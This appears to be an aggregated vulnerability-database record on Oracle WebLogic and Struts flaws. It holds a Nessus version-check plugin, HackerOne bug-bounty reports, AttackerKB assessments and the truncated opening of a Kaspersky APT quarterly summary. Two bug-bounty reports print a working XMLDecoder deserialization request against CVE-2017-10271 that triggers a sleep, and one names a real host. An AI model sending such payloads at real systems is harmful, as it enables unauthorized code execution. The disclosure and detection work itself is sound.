script_set_attribute(attribute:\"description\", value:\n\"Oracle WebCenter Sites component of Oracle Fusion Middleware is vulnerable to multiple vulnerabilities.\n\n - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent:\n Install (Apache Common Collections)). An unauthenticated, remote attacker can exploit this, via a crafted\n serialized Java object, to bypass authentication and execute arbitrary commands. (CVE-2015-7501)\n\n - An unspecified vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware\n (subcomponent: Server). An unauthenticated, remote attacker can exploit this, via HTTP, to obtain access\n to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized\n update, insert or delete access to some of Oracle WebCenter Sites accessible data and unauthorized ability\n to cause a partial denial of service (partial DOS) of Oracle WebCenter Sites. (CVE-2017-3542)\n\n - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent:\n Third Party Tools (Struts 2)) due to incorrect exception handling and error-message generation during\n file-upload attempts. An unauthenticated, remote attacker can exploit this, via a crafted Content-Type,\n Content-Disposition, or Content-Length HTTP header, to bypass authentication and execute arbitrary\n commands. (CVE-2017-5638)\n\nIn addition, Oracle WebCenter Sites is also affected by several additional vulnerabilities including code execution,\ndenial of service, information disclosure, and other unspecified vulnerabilities. Note that Nessus has not attempted to\nexploit these issues but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuapr2017.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2017 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_webcenter_sites_installed.nbin\");\n script_require_keys(\"SMB/WebCenter_Sites/Installed\");\n\n exit(0);\n}\n\nport = get_kb_item('SMB/transport');\nif (isnull(port))\n port = 445;\n\nget_kb_item_or_exit('SMB/WebCenter_Sites/Installed');\n\nversions = get_kb_list('SMB/WebCenter_Sites/*/Version');\nif (isnull(versions)) exit(1, 'Unable to obtain a version list for Oracle WebCenter Sites.');\n\nreport = '';\n\nforeach key (keys(versions))\n{\n fix = '';\n\n version = versions[key];\n revision = get_kb_item(key - '/Version' + '/Revision');\n path = get_kb_item(key - '/Version' + '/Path');\n\n if (isnull(version) || isnull(revision)) continue;\n\n # Patch 25883419 - 11.1.1.8.0 < Revision 184000 \n if (version =~ \"^11\\.1\\.1\\.8\\.0$\" && revision < 184000)\n {\n fix = '\\n Fixed revision : 184000' +\n '\\n Required patch : 25883419';\n }\n # Patch 25806935 - 12.2.1.0.0 < Revision 184040 \n else if (version =~ \"^12\\.2\\.1\\.0\\.0$\" && revision < 184040)\n {\n fix = '\\n Fixed revision : 184040' +\n '\\n Required patch : 25806935';\n }\n # Patch 25806943 - 12.2.1.1.0 < Revision 184025 \n else if (version =~ \"^12\\.2\\.1\\.1\\.0$\" && revision < 184025)\n {\n fix = '\\n Fixed revision : 184025' +\n '\\n Required patch : 25806943';\n }\n # Patch 25806946 - 12.2.1.2.0 < Revision 184026 \n else if (version =~ \"^12\\.2\\.1\\.2\\.0$\" && revision < 184026)\n {\n fix = '\\n Fixed revision : 184026' +\n '\\n Required patch : 25806946';\n }\n\n if (fix != '')\n {\n if (!isnull(path)) report += '\\n Path : ' + path;\n report += '\\n Version : ' + version +\n '\\n Revision : ' + revision +\n fix + '\\n';\n }\n}\n\nif (report != '') security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Oracle WebCenter Sites\");\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackerone": [{"lastseen": "2023-09-03T14:04:45", "bounty": 0.0, "description": "##Summary\n\nHello. I was able to identify RCE vulnerability due to the outdated Oracle Weblogic instance on `https://raebilling.mtn.co.za`.\n\n##Steps To Reproduce\n\n* To reproduce, launch this request with BurpSuite\n* This request to the `https://raebilling.mtn.co.za/wls-wsat/CoordinatorPortType` will trigger sleep for 15 seconds (same applies for 20 secondes, 40 seconds):\n\n```\nPOST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1\nHost: raebilling.mtn.co.za\nContent-Length: 426\ncontent-type: text/xml\nAccept-Encoding: gzip, deflate, compress\nAccept: */*\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java class=\"java.beans.XMLDecoder\">\n <object class=\"java.lang.Thread\" method=\"sleep\">\n <long>40000</long>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n```\n==**POC:**== {F736913} {F736912} {F736915}\n\n## Suggested Mitigation/Remediation Actions\n* Patching WebLogic to the recent version will fix the issue.\n\n## Impact\n\n**This vulnerability allow an unauthenticated attacker:**\n* To perform Remote OS Command Execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-03-04T13:45:59", "type": "hackerone", "title": "MTN Group: Remote OS Command Execution on Oracle Weblogic server via [CVE-2017-10271]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2021-04-25T12:39:51", "id": "H1:810755", "href": "https://hackerone.com/reports/810755", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-09-03T20:38:54", "bounty": 0.0, "description": "**Summary:**\nHappy Friday! The server at `\u2588\u2588\u2588\u2588\u2588\u2588` is vulnerable to CVE-2017-10271 \"Oracle WebLogic Server Remote Command Execution\".\n\n**Description:**\nThe following request takes 12 seconds (12000 milliseconds) to complete:\n```\nPOST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nContent-Length: 423\ncontent-type: text/xml\nAccept-Encoding: gzip, deflate, compress\nAccept: */*\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java class=\"java.beans.XMLDecoder\">\n <object class=\"java.lang.Thread\" method=\"sleep\">\n <long>12000</long>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n```\nThis proves that I have Java code execution on the remote server. \n\nref: https://techblog.mediaservice.net/2018/07/cve-2017-10271-oracle-weblogic-server-remote-command-execution-sleep-detection-payload/\n\nPublic exploits for this exist: https://github.com/c0mmand3rOpSec/CVE-2017-10271\nI was not able to use that script with a `ping` command, which might have been blocked by preventing outbound connections.\n\n## Suggested Mitigation/Remediation Actions\nPatch & possibly don't allow external access.\n\n## Impact\n\nCritical, RCE.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-05-10T22:23:31", "type": "hackerone", "title": "U.S. Dept Of Defense: RCE on \u2588\u2588\u2588\u2588\u2588 via CVE-2017-10271", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2019-07-01T19:54:20", "id": "H1:576887", "href": "https://hackerone.com/reports/576887", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-07-06T16:00:44", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. @0daystolive and @dly were able to demonstrate this vulnerability by developing a custom script that caused the webserver to execute a benign command. This was a very clever demonstration. Thank you!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-13T13:22:29", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-05-31T21:36:13", "id": "H1:213069", "href": "https://hackerone.com/reports/213069", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-01T00:57:28", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. Thank you @n0rb3r7 for notifying us of this vulnerability!\nI was able to leverage a recent, well-known vulnerability to achieve arbitrary, remote command execution on a U.S. Department Of Defense server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-13T04:14:12", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote code execution vulnerability on a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-07-03T18:23:05", "id": "H1:212985", "href": "https://hackerone.com/reports/212985", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-01T01:06:10", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. @0daystolive and @dly were able to demonstrate this vulnerability by developing a custom script that caused the webserver to execute a benign command. This was a very clever demonstration. Thank you!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-09T17:59:08", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-01T14:48:16", "id": "H1:212022", "href": "https://hackerone.com/reports/212022", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-09-30T03:24:10", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).\n\n \n**Recent assessments:** \n \n**wchen-r7** at May 23, 2019 5:44pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\n**asoto-r7** at September 12, 2019 6:06pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-19T00:00:00", "type": "attackerkb", "title": "CVE-2017-10271 - Oracle WebLogic Server AsyncResponseService Deserialization Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2021-07-27T00:00:00", "id": "AKB:7992242A-E0F4-4572-BE13-859467611F09", "href": "https://attackerkb.com/topics/KjHcjsGuez/cve-2017-10271---oracle-weblogic-server-asyncresponseservice-deserialization-vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-23T17:24:09", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:29pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\n**hrbrmstr** at May 12, 2020 7:45pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-5638", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2020-07-30T00:00:00", "id": "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "href": "https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T17:28:07", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:30pm UTC reported:\n\nUnlike [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>), which was exploitable out of the box, since it targeted Struts\u2019 Jakarta multipart parser, this vulnerability requires a certain set of circumstances to be true in order for Struts to be exploitable. Since Struts is a web application framework, this will depend entirely on the application the developers have created.\n\n**I don\u2019t know how common this particular scenario is.** Please read the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-059>) for more information. However, what I do know is that this CVE falls somewhere after [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>) and [CVE-2018-11776](<https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776>) on the exploitability scale, from most exploitable to least: a parser flaw, a configuration flaw, and a programming flaw.\n\nSo, definitely patch this, but also follow Struts development best practices, including those outlined in their security bulletins. No measure of mitigations will protect you from poorly written code.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776", "CVE-2019-0230"], "modified": "2020-11-17T00:00:00", "id": "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "href": "https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2019-10-16T11:39:54", "description": "\n\nFor more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2019.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.\n\n## **The most remarkable findings**\n\nOn August 30, Ian Beer from Google's Project Zero team published an extensive analysis of at least 14 iOS zero-days found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. Although the use of watering-hole attacks was popular in the early 2010s, it has now become less common. According to Google, a number of waterholed websites were delivering the exploits, possibly as far back as three years ago (based on September 2016 usage of the first exploit chain). While the blog contains no details about the compromised sites or if they are still active, it claims that these websites receive \"thousands of visitors per week\". The first stage Webkit exploit used to infect visitors makes no discrimination other than that the victim uses an iPhone and browses the website with Safari, although the vulnerability would also have worked in other browsers such as Chrome. The lack of victim discrimination would point to a relatively non-targeted attack, but the not-so-high estimate of the number of visitors to the waterholed sites seems to indicate that the attack was targeted at some communities: it is likely that these waterholed sites were all dedicated to some common topic. The blog does not contains many details regarding who the actor behind this attack is, but the high technical capabilities needed to deliver and install this malware, and keep the exploitation chains up-to-date for more than two years, shows a high level of resources and dedication. Upon infection, the malware itself will be invisible to the victim. It pings its C2 every 60 seconds for new commands. It is able to get access to all kinds of files in the system, as well as tracking GPS position. There is no mechanism to survive a reboot, but the capability to steal signing-in cookies from a victim's account can keep providing the attackers with access to this data.\n\nShortly after the Google blogpost, Volexity published more details about the waterholing websites used in the attack to distribute the malware, pointing to a \"strategic web compromise targeting Uyghurs\". Citizen Lab published the Android counterpart for this story, stating that between November 2018 and May 2019, senior members of Tibetan groups were targeted by the same actor (this time dubbed POISON CARP by Citizen Lab) using malicious links in WhatsApp text exchanges, with the attackers posing as NGO workers, journalists and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages.\n\nAt the beginning of September 2019, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS: the exploit broker is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company's previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium [has also reduced payouts](<https://threatpost.com/android-zero-days-worth-more-iphone-exploits/147981/>) for Apple one-click exploits. On the same day, a high-severity zero-day was found in the v412 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, [was not included](<https://threatpost.com/android-zero-day-bug-opens-door-to-privilege-escalation-attack-researchers-warn/148014/>) in Google's September security update. A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to [gain full access](<https://www.independent.co.uk/life-style/gadgets-and-tech/news/android-security-flaw-hack-samsung-huawei-phone-text-message-sms-a9093111.html>) to emails on a compromised device using an SMS message.\n\n## **Russian-speaking activity**\n\nTurla (aka Venomous Bear, Uroburos and Waterbug) has made significant changes to its toolset. While investigating malicious activity in Central Asia, we identified a new backdoor that we attribute with medium confidence to this APT group. The malware, named Tunnus, is a.NET-based backdoor with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the C2 infrastructure has been built using compromised sites with vulnerable WordPress installations. According to our telemetry, Tunnus activity started in March and was still active when we published our private report in July.\n\nTurla has also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new.NET file that the group is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. Some of the changes are to help Turla evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. The malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. Two KopiLuwak analogues \u2013 the.NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 are used for cyber-espionage. We think that the threat actor deploys these versions where their targets are protected with security software capable of detecting KopiLuwak. All three implants can fingerprint targets, gather information on system and network adapters, steal files and download and execute additional malware. MiamiBeach is also able to take screenshots.\n\nIn September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file sharing site. In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.\n\n## **Chinese-speaking activity**\n\nHoneyMyte (aka Temp.Hex and Mustang Panda), which has been active for several years, has adopted different techniques to perform its attacks over the past couple of years, and has focused on various targeting profiles. In previous attacks, conducted from mid-2018, this threat actor deployed PlugX implants, as well as multi-stage PowerShell scripts resembling CobaltStrike. That campaign targeted government entities in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh. We recently described a new set of activities from HoneyMyte involving attacks that relied on several types of tools. They include: (a) PlugX implants; (b) a multi-stage package resembling the CobaltStrike stager and stageless droppers with PowerShell and VB scripts,.NET executables, cookie-stealers and more; (c) ARP poisoning with DNS hijacking malware, to deliver poisoned Flash and Microsoft updates over http for lateral movement; (d) various system and network utilities. Based on the targeting of government organizations related to natural resource management in Myanmar and a major continental organization in Africa, we assess that one of the main motivations of HoneyMyte is gathering geo-political and economic intelligence. While a military organization was targeted in\n\nBangladesh, it's possible that the individual targets were related to geopolitical activity in the region.\n\nSince the beginning of 2019, we have observed a spike in LuckyMouse activity, both in Central Asia and the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. LuckyMouse hasn't changed any of its TTPs (Tactics, Techniques and Procedures), continuing to rely on its own tools to get a foothold in the victim's network. The new campaigns consist of HTTPBrowser as a first stage, followed by the Soldier Trojan as a second-stage implant. The attackers made a change to their infrastructure, as they seem to solely rely on IPv4 addresses instead of domain names for their C2s, which can be seen as an attempt by them to limit correlation. The campaigns from this actor were still active at the time we published our latest private report on LuckyMouse in September.\n\nOur January 2018 private report 'ShaggyPanther \u2013 Chinese-speaking cluster of activity in APAC' introduced ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia. Related components and activity span back over a decade, with similar code maintaining compilation timestamps as far back as 2004. Since then ShaggyPanther activity has been detected in several more locations: the most recent detections occurred on servers in Indonesia in July, and, somewhat surprisingly, in Syria in March. The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer 